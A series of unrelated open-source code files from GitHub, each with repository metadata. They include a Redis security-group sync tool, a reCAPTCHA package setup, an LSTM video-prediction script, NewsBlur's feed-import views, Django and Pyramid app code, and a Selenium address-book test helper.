if dryrun:
vifs = len(client.vif_keys())
if vifs > 0:
print("There are %d VIFs with rules in Redis, some of which "
"may be overwritten!" % vifs)
print()
overwrite_count = 0
for port in ports_with_groups:
mac = netaddr.EUI(port["mac_address"])
# Rather than loading everything in one giant chunk, we'll make
# trips per port.
group_ids = [g["id"] for g in port.security_groups]
rules = db_api.security_group_rule_find(ctx, group_id=group_ids,
scope=db_api.ALL)
if dryrun:
existing_rules = client.get_rules_for_port(port["device_id"],
port["mac_address"])
if existing_rules:
overwrite_count += 1
db_len = len(rules)
existing_len = len(existing_rules["rules"])
print("== Port ID:%s - MAC:%s - Device ID:%s - "
"Redis Rules:%d - DB Rules:%d" %
(port["id"], mac, port["device_id"], existing_len,
db_len))
if not dryrun:
for retry in xrange(self._retries):
try:
payload = client.serialize_rules(rules)
client.apply_rules(
port["device_id"], port["mac_address"], payload)
break
except q_exc.RedisConnectionFailure:
time.sleep(self._retry_delay)
client = self._get_connection(giveup=False)
if dryrun:
print()
print("Total number of VIFs to overwrite/were overwritten: %s" %
overwrite_count)
diff = vifs - overwrite_count
if diff > 0:
print("Orphaned VIFs in Redis:", diff)
print("Run purge-orphans to clean then up")
if dryrun:
print("Total number of VIFs to write: %d" %
len(ports_with_groups))
if dryrun:
print('=' * 80)
print("Re-run with --yarly to apply changes")
print("Done!")
def main():
arguments = docopt.docopt(__doc__,
version="Quark Redis CLI %.2f" % VERSION)
redis_tool = QuarkRedisTool(arguments)
redis_tool.dispatch()
if __name__ == "__main__":
main()
|
{
"content_hash": "f52e4ffacef82701c983e9a810db3ec6",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 79,
"avg_line_length": 35.1,
"alnum_prop": 0.5264957264957265,
"repo_name": "roaet/quark",
"id": "f32fb1e70ee6ebdbfb623b234f1501f399113a01",
"size": "9431",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "quark/tools/redis_sg_tool.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1565663"
},
{
"name": "Shell",
"bytes": "9360"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup
_branch_path = os.path.abspath(os.path.dirname(__file__))
_readme = open(os.path.join(_branch_path, 'README.txt')).read()
_version = open(os.path.join(_branch_path, 'VERSION.txt')).readline().rstrip()
setup(
name='recaptcha',
version=_version,
description='Pythonic, well documented and fully featured reCAPTCHA client',
long_description=_readme,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Security',
],
keywords='recaptcha captcha',
author='2degrees Limited',
author_email='2degrees-floss@googlegroups.com',
url='http://packages.python.org/recaptcha',
download_url='http://pypi.python.org/pypi/recaptcha/',
license='BSD (http://dev.2degreesnetwork.com/p/2degrees-license.html)',
py_modules=['recaptcha'],
zip_safe=False,
tests_require=['coverage', 'nose'],
test_suite='nose.collector',
)
|
{
"content_hash": "fb4ec677e4ca51b912739629274f2696",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 80,
"avg_line_length": 34.578947368421055,
"alnum_prop": 0.639269406392694,
"repo_name": "2degrees/python-recaptcha",
"id": "9bbaa4e369286bf58aa946e06682959be8515c1e",
"size": "2074",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "5609"
},
{
"name": "Python",
"bytes": "31659"
}
],
"symlink_target": ""
}
|
import argparse
import json
import os
from keras.layers import LSTM, BatchNormalization, Dense, Dropout, Input, TimeDistributed
from keras.models import Model
from progressbar import ProgressBar
import h5py
def extract_predicted_outputs(experiment_id,
input_dataset,
num_cells,
num_layers,
epoch,
output_path,
subset=None):
if subset == None:
subsets = ['validation', 'testing']
else:
subsets = [subset]
weights_path = 'data/model_snapshot/lstm_activity_classification_{experiment_id}_e{nb_epoch:03d}.hdf5'.format(
experiment_id=experiment_id, nb_epoch=epoch)
store_file = 'predictions_{experiment_id}.hdf5'.format(
experiment_id=experiment_id, nb_epoch=epoch)
store_path = os.path.join(output_path, store_file)
print('Compiling model')
input_features = Input(batch_shape=(1, 1, 4096, ), name='features')
input_normalized = BatchNormalization(name='normalization')(input_features)
input_dropout = Dropout(p=0.5)(input_normalized)
lstms_inputs = [input_dropout]
for i in range(num_layers):
previous_layer = lstms_inputs[-1]
lstm = LSTM(
num_cells,
return_sequences=True,
stateful=True,
name='lsmt{}'.format(i + 1))(previous_layer)
lstms_inputs.append(lstm)
output_dropout = Dropout(p=0.5)(lstms_inputs[-1])
output = TimeDistributed(
Dense(201, activation='softmax'), name='fc')(output_dropout)
model = Model(input=input_features, output=output)
model.load_weights(weights_path)
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
print('Model Compiled!')
h5_dataset = h5py.File(input_dataset, 'r')
h5_predict = h5py.File(store_path, 'w')
with open('dataset/videos.json', 'r') as f:
videos_info = json.load(f)
for subset in subsets:
videos = [
v for v in videos_info.keys() if videos_info[v]['subset'] == subset
]
videos = list(set(videos) & set(h5_dataset.keys()))
nb_videos = len(videos)
print('Predicting {} subset...'.format(subset))
progbar = ProgressBar(max_value=nb_videos)
count = 0
output_subset = h5_predict.create_group(subset)
for video_id in videos:
progbar.update(count)
video_features = h5_dataset[video_id][...]
nb_instances = video_features.shape[0]
video_features = video_features.reshape(nb_instances, 1, 4096)
model.reset_states()
Y = model.predict(video_features, batch_size=1)
Y = Y.reshape(nb_instances, 201)
output_subset.create_dataset(video_id, data=Y)
count += 1
progbar.finish()
h5_dataset.close()
h5_predict.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Predict the output with the trained RNN')
parser.add_argument(
'--id',
dest='experiment_id',
default=0,
help='Experiment ID to track and not overwrite resulting models')
parser.add_argument(
'-i',
'--video-features',
type=str,
dest='video_features',
default='data/dataset/video_features.hdf5',
help='File where the video features are stored (default: %(default)s)')
parser.add_argument(
'-n',
'--num-cells',
type=int,
dest='num_cells',
default=512,
help=
'Number of cells for each LSTM layer when trained (default: %(default)s)'
)
parser.add_argument(
'--num-layers',
type=int,
dest='num_layers',
default=1,
help=
'Number of LSTM layers of the network to train when trained (default: %(default)s)'
)
parser.add_argument(
'-e',
'--epoch',
type=int,
dest='epoch',
default=100,
help=
'epoch at which you want to load the weights from the trained model (default: %(default)s)'
)
parser.add_argument(
'-o',
'--output',
type=str,
dest='output_path',
default='data/dataset',
help='path to store the output file (default: %(default)s)')
parser.add_argument(
'-s',
'--subset',
type=str,
dest='subset',
default=None,
choices=['validation', 'testing'],
help=
'Subset you want to predict the output (default: validation and testing)'
)
args = parser.parse_args()
extract_predicted_outputs(args.experiment_id, args.video_features,
args.num_cells, args.num_layers, args.epoch,
args.output_path, args.subset)
|
{
"content_hash": "29d77530c0b6947363400a91f929d262",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 114,
"avg_line_length": 31.928571428571427,
"alnum_prop": 0.5745373195037624,
"repo_name": "imatge-upc/activitynet-2016-cvprw",
"id": "1928bf10d5199176e7f44d0fcf37606fb34093c0",
"size": "4917",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/predict.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "6414241"
},
{
"name": "Python",
"bytes": "66318"
},
{
"name": "Shell",
"bytes": "472"
}
],
"symlink_target": ""
}
|
import datetime
import pickle
import base64
import httplib2
from utils import log as logging
from oauth2client.client import OAuth2WebServerFlow, FlowExchangeError
from bson.errors import InvalidStringData
import uuid
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
# from django.db import IntegrityError
from django.http import HttpResponse, HttpResponseRedirect
from django.conf import settings
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth import login as login_user
from django.shortcuts import render_to_response
from apps.reader.forms import SignupForm
from apps.reader.models import UserSubscription
from apps.feed_import.models import OAuthToken, GoogleReaderImporter
from apps.feed_import.models import OPMLImporter, OPMLExporter, UploadedOPML
from apps.feed_import.tasks import ProcessOPML, ProcessReaderImport, ProcessReaderStarredImport
from utils import json_functions as json
from utils.user_functions import ajax_login_required, get_user
from utils.feed_functions import TimeoutError
@ajax_login_required
def opml_upload(request):
xml_opml = None
message = "OK"
code = 1
payload = {}
if request.method == 'POST':
if 'file' in request.FILES:
logging.user(request, "~FR~SBOPML upload starting...")
file = request.FILES['file']
xml_opml = str(file.read().decode('utf-8', 'ignore'))
try:
UploadedOPML.objects.create(user_id=request.user.pk, opml_file=xml_opml)
except (UnicodeDecodeError, InvalidStringData):
folders = None
code = -1
message = "There was a Unicode decode error when reading your OPML file."
opml_importer = OPMLImporter(xml_opml, request.user)
try:
folders = opml_importer.try_processing()
except TimeoutError:
folders = None
ProcessOPML.delay(request.user.pk)
feed_count = opml_importer.count_feeds_in_opml()
logging.user(request, "~FR~SBOPML upload took too long, found %s feeds. Tasking..." % feed_count)
payload = dict(folders=folders, delayed=True, feed_count=feed_count)
code = 2
message = ""
except AttributeError:
code = -1
message = "OPML import failed. Couldn't parse XML file."
folders = None
if folders:
code = 1
feeds = UserSubscription.objects.filter(user=request.user).values()
payload = dict(folders=folders, feeds=feeds)
logging.user(request, "~FR~SBOPML Upload: ~SK%s~SN~SB~FR feeds" % (len(feeds)))
request.session['import_from_google_reader'] = False
else:
message = "Attach an .opml file."
code = -1
return HttpResponse(json.encode(dict(message=message, code=code, payload=payload)),
mimetype='text/html')
def opml_export(request):
user = get_user(request)
now = datetime.datetime.now()
if request.REQUEST.get('user_id') and user.is_staff:
user = User.objects.get(pk=request.REQUEST['user_id'])
exporter = OPMLExporter(user)
opml = exporter.process()
response = HttpResponse(opml, mimetype='text/xml')
response['Content-Disposition'] = 'attachment; filename=NewsBlur Subscriptions - %s - %s' % (
user.username,
now.strftime('%Y-%m-%d')
)
return response
def reader_authorize(request):
ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', "")
reader_importer = GoogleReaderImporter(request.user)
if reader_importer.test():
logging.user(request, "~BB~FW~SBSkipping Google Reader import, already tokened")
return render_to_response('social/social_connect.xhtml', {
}, context_instance=RequestContext(request))
domain = Site.objects.get_current().domain
STEP2_URI = "http://%s%s" % (
(domain + '.com') if not domain.endswith('.com') else domain,
reverse('google-reader-callback'),
)
FLOW = OAuth2WebServerFlow(
client_id=settings.GOOGLE_OAUTH2_CLIENTID,
client_secret=settings.GOOGLE_OAUTH2_SECRET,
scope="http://www.google.com/reader/api",
redirect_uri=STEP2_URI,
user_agent='NewsBlur Pro, www.newsblur.com',
approval_prompt="force",
)
logging.user(request, "~BB~FW~SBAuthorize Google Reader import - %s" % (
request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', ""),
))
authorize_url = FLOW.step1_get_authorize_url(redirect_uri=STEP2_URI)
response = render_to_response('social/social_connect.xhtml', {
'next': authorize_url,
}, context_instance=RequestContext(request))
# Save request token and delete old tokens
auth_token_dict = dict()
if request.user.is_authenticated():
OAuthToken.objects.filter(user=request.user).delete()
auth_token_dict['user'] = request.user
else:
OAuthToken.objects.filter(session_id=request.session.session_key).delete()
OAuthToken.objects.filter(remote_ip=ip).delete()
auth_token_dict['uuid'] = str(uuid.uuid4())
auth_token_dict['session_id'] = request.session.session_key
auth_token_dict['remote_ip'] = ip
OAuthToken.objects.create(**auth_token_dict)
response.set_cookie('newsblur_reader_uuid', str(uuid.uuid4()))
return response
def reader_callback(request):
ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', "")
domain = Site.objects.get_current().domain
STEP2_URI = "http://%s%s" % (
(domain + '.com') if not domain.endswith('.com') else domain,
reverse('google-reader-callback'),
)
FLOW = OAuth2WebServerFlow(
client_id=settings.GOOGLE_OAUTH2_CLIENTID,
client_secret=settings.GOOGLE_OAUTH2_SECRET,
scope="http://www.google.com/reader/api",
redirect_uri=STEP2_URI,
user_agent='NewsBlur Pro, www.newsblur.com',
)
FLOW.redirect_uri = STEP2_URI
http = httplib2.Http()
http.disable_ssl_certificate_validation = True
try:
credential = FLOW.step2_exchange(request.REQUEST)
except FlowExchangeError:
logging.info(" ***> [%s] Bad token from Google Reader." % (request.user,))
return render_to_response('social/social_connect.xhtml', {
'error': 'There was an error trying to import from Google Reader. Trying again will probably fix the issue.'
}, context_instance=RequestContext(request))
user_token = None
if request.user.is_authenticated():
user_token = OAuthToken.objects.filter(user=request.user).order_by('-created_date')
if not user_token:
user_uuid = request.COOKIES.get('newsblur_reader_uuid')
if user_uuid:
user_token = OAuthToken.objects.filter(uuid=user_uuid).order_by('-created_date')
if not user_token:
session = request.session
if session.session_key:
user_token = OAuthToken.objects.filter(session_id=request.session.session_key).order_by('-created_date')
if not user_token:
user_token = OAuthToken.objects.filter(remote_ip=ip).order_by('-created_date')
if user_token:
user_token = user_token[0]
user_token.credential = base64.b64encode(pickle.dumps(credential))
user_token.session_id = request.session.session_key
user_token.save()
# Fetch imported feeds on next page load
request.session['import_from_google_reader'] = True
logging.user(request, "~BB~FW~SBFinishing Google Reader import - %s" % ip)
if request.user.is_authenticated():
return render_to_response('social/social_connect.xhtml', {}, context_instance=RequestContext(request))
return HttpResponseRedirect(reverse('import-signup'))
@json.json_view
def import_from_google_reader(request):
code = 0
feed_count = 0
starred_count = 0
delayed = False
if request.user.is_authenticated():
reader_importer = GoogleReaderImporter(request.user)
auto_active = bool(request.REQUEST.get('auto_active') or False)
try:
code = reader_importer.try_import_feeds(auto_active=auto_active)
except TimeoutError:
ProcessReaderImport.delay(request.user.pk, auto_active=auto_active)
feed_count = UserSubscription.objects.filter(user=request.user).count()
logging.user(request, "~FR~SBGoogle Reader import took too long, found %s feeds. Tasking..." % feed_count)
delayed = True
code = 2
if 'import_from_google_reader' in request.session:
del request.session['import_from_google_reader']
feed_count = UserSubscription.objects.filter(user=request.user).count()
return dict(code=code, delayed=delayed, feed_count=feed_count, starred_count=starred_count)
@json.json_view
def import_starred_stories_from_google_reader(request):
code = 0
feed_count = 0
starred_count = 0
delayed = False
if request.user.is_authenticated():
reader_importer = GoogleReaderImporter(request.user)
try:
starred_count = reader_importer.try_import_starred_stories()
except TimeoutError:
ProcessReaderStarredImport.delay(request.user.pk)
feed_count = UserSubscription.objects.filter(user=request.user).count()
logging.user(request, "~FR~SBGoogle Reader starred stories import took too long, found %s feeds, %s stories. Tasking..." % (feed_count, starred_count))
delayed = True
code = 2
feed_count = UserSubscription.objects.filter(user=request.user).count()
return dict(code=code, delayed=delayed, feed_count=feed_count, starred_count=starred_count)
def import_signup(request):
ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', "")
if request.method == "POST":
signup_form = SignupForm(prefix='signup', data=request.POST)
if signup_form.is_valid():
new_user = signup_form.save()
user_token = OAuthToken.objects.filter(user=new_user)
if not user_token:
user_uuid = request.COOKIES.get('newsblur_reader_uuid')
if user_uuid:
user_token = OAuthToken.objects.filter(uuid=user_uuid).order_by('-created_date')
if not user_token:
if request.session.session_key:
user_token = OAuthToken.objects.filter(session_id=request.session.session_key).order_by('-created_date')
if not user_token:
user_token = OAuthToken.objects.filter(remote_ip=ip).order_by('-created_date')
if user_token:
user_token = user_token[0]
user_token.session_id = request.session.session_key
user_token.user = new_user
user_token.save()
login_user(request, new_user)
if request.user.profile.is_premium:
return HttpResponseRedirect(reverse('index'))
url = "https://%s%s" % (Site.objects.get_current().domain,
reverse('stripe-form'))
return HttpResponseRedirect(url)
else:
logging.user(request, "~BR~FW ***> Can't find user token during import/signup. Re-authenticating...")
return HttpResponseRedirect(reverse('google-reader-authorize'))
else:
signup_form = SignupForm(prefix='signup')
return render_to_response('import/signup.xhtml', {
'signup_form': signup_form,
}, context_instance=RequestContext(request))
|
{
"content_hash": "f5b15aedbe974bddbf8387d4626a4ac4",
"timestamp": "",
"source": "github",
"line_count": 284,
"max_line_length": 163,
"avg_line_length": 42.45422535211268,
"alnum_prop": 0.638550219789334,
"repo_name": "petecummings/NewsBlur",
"id": "054439e1b1729dd59b2812eb76f5493dd5bc522f",
"size": "12057",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "apps/feed_import/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "4431"
},
{
"name": "C++",
"bytes": "2926"
},
{
"name": "CSS",
"bytes": "678472"
},
{
"name": "CoffeeScript",
"bytes": "6451"
},
{
"name": "HTML",
"bytes": "268726"
},
{
"name": "Java",
"bytes": "705714"
},
{
"name": "JavaScript",
"bytes": "1576948"
},
{
"name": "M",
"bytes": "47696"
},
{
"name": "Nginx",
"bytes": "897"
},
{
"name": "Objective-C",
"bytes": "3708787"
},
{
"name": "Perl",
"bytes": "55598"
},
{
"name": "Python",
"bytes": "2406474"
},
{
"name": "R",
"bytes": "527"
},
{
"name": "Ruby",
"bytes": "870"
},
{
"name": "Shell",
"bytes": "40018"
}
],
"symlink_target": ""
}
|
import unittest
from pyramid import testing
class ViewTests(unittest.TestCase):
def setUp(self):
self.config = testing.setUp()
def tearDown(self):
testing.tearDown()
def test_my_view(self):
from .views import my_view
request = testing.DummyRequest()
info = my_view(request)
# self.assertEqual(info['project'], 'angular-tictactoe')
|
{
"content_hash": "21132545466ee52c6eb88107493cfeec",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 64,
"avg_line_length": 23.294117647058822,
"alnum_prop": 0.6439393939393939,
"repo_name": "yqian1991/angular-tictactoe",
"id": "12eee7afab9712bfaf6ed8708cd0511381aa0c54",
"size": "396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "angulartictactoe/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3445"
},
{
"name": "Python",
"bytes": "6832"
},
{
"name": "Shell",
"bytes": "60"
}
],
"symlink_target": ""
}
|
from django.shortcuts import render, redirect
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.utils import timezone
from datetime import timedelta
from coursereg import models
from django.contrib.auth import update_session_auth_hash
from django.core.exceptions import PermissionDenied
from coursereg import utils
@login_required
def index(request):
if not request.user.user_type == models.User.USER_TYPE_STUDENT: raise PermissionDenied
if not request.user.adviser:
messages.error(request, 'Adviser not assigned.')
return redirect('coursereg:fatal')
context = {
'user_type': 'student',
'nav_active': 'home',
'user_email': request.user.email,
'reg_types': models.RegistrationType.objects.filter(is_active=True),
'user_id': request.user.id,
'participants': models.Participant.objects.filter(user=request.user).order_by('-course__term__last_reg_date', 'course__title'),
'notifications': [(n.created_at, models.Notification.ORIGIN_CHOICES[n.origin][1], n.message)
for n in models.Notification.objects.filter(user=request.user, is_student_acknowledged=False).order_by('-created_at')],
'courses': models.Course.objects.filter(term__last_reg_date__gte=timezone.now(),
term__start_reg_date__lte=timezone.now())
}
return render(request, 'coursereg/student.html', context)
|
{
"content_hash": "cde4c249ab4ce8b8be19a7773d9cf8e5",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 135,
"avg_line_length": 49.03030303030303,
"alnum_prop": 0.715698393077874,
"repo_name": "s-gv/bheemboy",
"id": "803d0d53a0dbfd24918a99f869ebaa30d74af413",
"size": "1618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "coursereg/views/student.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4279"
},
{
"name": "HTML",
"bytes": "116930"
},
{
"name": "JavaScript",
"bytes": "6144"
},
{
"name": "Python",
"bytes": "167718"
}
],
"symlink_target": ""
}
|
"""Urls for the Zinnia categories"""
from django.conf.urls import url
from django.conf.urls import patterns
from zinnia.urls import _
from zinnia.views.categories import CategoryList
from zinnia.views.categories import CategoryDetail
urlpatterns = patterns(
'',
url(r'^$',
CategoryList.as_view(),
name='category_list'),
url(_(r'^(?P<path>[-\/\w]+)/page/(?P<page>\d+)/$'),
CategoryDetail.as_view(),
name='category_detail_paginated'),
url(r'^(?P<path>[-\/\w]+)/$',
CategoryDetail.as_view(),
name='category_detail'),
)
|
{
"content_hash": "22e0775b7a84e2d7db17497c15fc5176",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 55,
"avg_line_length": 27.761904761904763,
"alnum_prop": 0.6260720411663808,
"repo_name": "ZuluPro/django-blog-zinnia",
"id": "c4624577e23b222f034be2166ef8f4bab3a1c3e0",
"size": "583",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "zinnia/urls/categories.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "77370"
},
{
"name": "HTML",
"bytes": "75068"
},
{
"name": "JavaScript",
"bytes": "235617"
},
{
"name": "Makefile",
"bytes": "1789"
},
{
"name": "Python",
"bytes": "506854"
}
],
"symlink_target": ""
}
|
"""tor_scraper contains simple tools for scraping websites via the Tor network.
"""
# Set default module logging handler to avoid 'No handler found' warnings
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
from .tor_scraper import TorScraper
|
{
"content_hash": "73f5f15d5181d23d73127aaad30a4353",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 79,
"avg_line_length": 30.444444444444443,
"alnum_prop": 0.781021897810219,
"repo_name": "peterbrandt84/tor_scraper",
"id": "d0580f2d2f9bfe2f8fdd5e085926da2fe012ec6c",
"size": "960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "7596"
}
],
"symlink_target": ""
}
|
from __future__ import division, print_function
|
{
"content_hash": "dee0929a7125821ced3e9eec238a91b3",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 47,
"avg_line_length": 48,
"alnum_prop": 0.7708333333333334,
"repo_name": "Erotemic/hotspotter",
"id": "f4319b817d9fa7df772ea493934cbb7bd71c0faa",
"size": "48",
"binary": false,
"copies": "9",
"ref": "refs/heads/jon",
"path": "_setup/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "175"
},
{
"name": "Python",
"bytes": "2017583"
},
{
"name": "Shell",
"bytes": "20855"
}
],
"symlink_target": ""
}
|
from django.conf.urls import url
from api.osf_groups import views
app_name = 'osf'
urlpatterns = [
url(r'^$', views.GroupList.as_view(), name=views.GroupList.view_name),
url(r'^(?P<group_id>\w+)/$', views.GroupDetail.as_view(), name=views.GroupDetail.view_name),
url(r'^(?P<group_id>\w+)/members/$', views.GroupMembersList.as_view(), name=views.GroupMembersList.view_name),
url(r'^(?P<group_id>\w+)/members/(?P<user_id>\w+)/$', views.GroupMemberDetail.as_view(), name=views.GroupMemberDetail.view_name),
]
|
{
"content_hash": "e01b1c0ec042e041fe9c6b61cebb33ea",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 133,
"avg_line_length": 43.75,
"alnum_prop": 0.6819047619047619,
"repo_name": "Johnetordoff/osf.io",
"id": "d877198eb1052902d3386ac6708a2b3b777068aa",
"size": "525",
"binary": false,
"copies": "9",
"ref": "refs/heads/develop",
"path": "api/osf_groups/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "93635"
},
{
"name": "Dockerfile",
"bytes": "5876"
},
{
"name": "HTML",
"bytes": "373738"
},
{
"name": "JavaScript",
"bytes": "1596130"
},
{
"name": "Mako",
"bytes": "679193"
},
{
"name": "Python",
"bytes": "11587197"
},
{
"name": "Shell",
"bytes": "2841"
},
{
"name": "VCL",
"bytes": "13885"
}
],
"symlink_target": ""
}
|
__author__ = 'vlovets'
from model.contact import Contact
import re
from selenium.webdriver.support.ui import Select
class ContactHelper:
def __init__(self, app):
self.app = app
def open_contact_page(self):
wd = self.app.wd
if not (wd.current_url.endswith('edit.php') and (len(wd.find_elements_by_name('submit')) > 0)):
wd.find_element_by_link_text("add new").click()
def open_home_page(self):
wd = self.app.wd
if not ((len(wd.find_elements_by_id('maintable')) > 0) and (len(wd.find_elements_by_name('add')) > 0)):
wd.find_element_by_link_text("home").click()
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def fill_contact_fields(self, contact):
wd = self.app.wd
self.change_field_value("firstname", contact.firstname)
self.change_field_value("middlename", contact.middlename)
self.change_field_value("lastname", contact.lastname)
self.change_field_value("nickname", contact.nickname)
self.change_field_value("title", contact.title)
self.change_field_value("company", contact.company)
self.change_field_value("address", contact.address)
self.change_field_value("home", contact.home)
self.change_field_value("mobile", contact.mobile)
self.change_field_value("work", contact.work)
self.change_field_value("fax", contact.fax)
self.change_field_value("email2", contact.email2)
self.change_field_value("email", contact.email)
self.change_field_value("email3", contact.email3)
self.change_field_value("homepage", contact.homepage)
self.change_field_value("address2", contact.address2)
self.change_field_value("phone2", contact.phone2)
self.change_field_value("notes", contact.notes)
def select_first_contact(self, index):
self.select_contact_by_index(0)
def select_contact_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def create(self, contact):
wd = self.app.wd
self.open_contact_page()
self.fill_contact_fields(contact)
# submit creation
wd.find_element_by_name("submit").click()
self.contact_cache = None
def delete_first_contact(self, index):
self.delete_contact_by_index(0)
def delete_contact_by_index(self, index):
success = True
wd = self.app.wd
self.open_home_page()
self.select_contact_by_index(index)
#submit deletion
wd.find_element_by_xpath("//div[@id='content']/form[@name='MainForm']/div[2]/input").click()
#ok
wd.switch_to_alert().accept()
self.contact_cache = None
def edit(self, index):
self.modify_some_contact(0)
def modify_some_contact(self, index, contact):
wd = self.app.wd
self.open_home_page()
wd.find_elements_by_css_selector('img[alt="Edit"]')[index].click()
self.fill_contact_fields(contact)
# submit creation
wd.find_element_by_name("update").click()
self.contact_cache = None
def count(self):
wd = self.app.wd
self.open_home_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.open_home_page()
self.contact_cache = []
for element in wd.find_elements_by_css_selector('tr[name=entry]'):
cells = element.find_elements_by_tag_name('td')
firstname = cells[2].text #element.find_elements_by_css_selector('td')[1].text
lastname = cells[1].text #element.find_elements_by_css_selector('td')[2].text
address = cells[3].text
all_mails = cells[4].text
all_phones = cells[5].text #all_phones = cells[5].text.splitlines()
id = element.find_element_by_name('selected[]').get_attribute('value') #id = cells[0].find_element_by_tag_name('input').get_attribute('value')
self.contact_cache.append(Contact(firstname=firstname, lastname=lastname,
address=address, all_mails=all_mails,
all_phones_from_homepge=all_phones, id=id))
return list(self.contact_cache)
def open_contact_to_edit_by_index(self, index):
wd = self.app.wd
self.open_home_page()
wd.find_elements_by_css_selector('img[alt="Edit"]')[index].click()
def open_contact_view_by_index(self, index):
wd = self.app.wd
self.open_home_page()
wd.find_elements_by_css_selector('img[alt="Details"]')[index].click()
def get_contact_info_from_edit_page(self, index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname = wd.find_element_by_name("firstname").get_attribute('value')
lastname = wd.find_element_by_name('lastname').get_attribute('value')
address = wd.find_element_by_name('address').get_attribute('value')
id = wd.find_element_by_name('id').get_attribute('value')
email = wd.find_element_by_name('email').get_attribute('value')
email2 = wd.find_element_by_name('email2').get_attribute('value')
email3 = wd.find_element_by_name('email3').get_attribute('value')
home = wd.find_element_by_name('home').get_attribute('value')
mobile = wd.find_element_by_name('mobile').get_attribute('value')
work = wd.find_element_by_name('work').get_attribute('value')
phone2 = wd.find_element_by_name('phone2').get_attribute('value')
return Contact(firstname=firstname, lastname=lastname, address=address,
id=id, email=email,
email2=email2, email3=email3,
home=home, mobile=mobile,
work=work, phone2=phone2)
def get_contact_from_view_page(self, index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text = wd.find_element_by_id('content').text
home = re.search('H: (.*)', text).group(1)
mobile = re.search('M: (.*)', text).group(1)
work = re.search('W: (.*)', text).group(1)
phone2 = re.search('P: (.*)', text).group(1)
return Contact(home=home, mobile=mobile,
work=work, phone2=phone2)
def select_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
wd.find_element_by_xpath("//div[@id='content']/form[@name='MainForm']/div[2]/input").click()
def select_contact_by_id_for_group(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def delete_contact_by_id(self, id):
success = True
wd = self.app.wd
self.open_home_page()
self.select_contact_by_id(id)
wd.switch_to_alert().accept()
self.contact_cache = None
def click_add_to_group(self):
wd = self.app.wd
wd.find_element_by_name("add").click()
def select_second_group(self):
wd = self.app.wd
self.open_home_page()
wd.find_element_by_xpath("//div[@class='right']/select//option[3]").click()
def display_contact_in_group(self, group_name):
wd = self.app.wd
self.open_home_page()
#wd.find_element_by_xpath("//form[@id='right']/select//option[5]").click()
element = wd.find_element_by_name('group')
select = Select(element)
select.select_by_visible_text(group_name)
def remove_from_group(self):
wd = self.app.wd
wd.find_element_by_name("remove").click()
|
{
"content_hash": "34cac67d6cf6fd8f57f85a15ce94bd88",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 158,
"avg_line_length": 41.597938144329895,
"alnum_prop": 0.5985130111524164,
"repo_name": "VLovets/python_01",
"id": "d2f0e6b2f51bfbfaa513e83360afbf28c226b9a9",
"size": "8070",
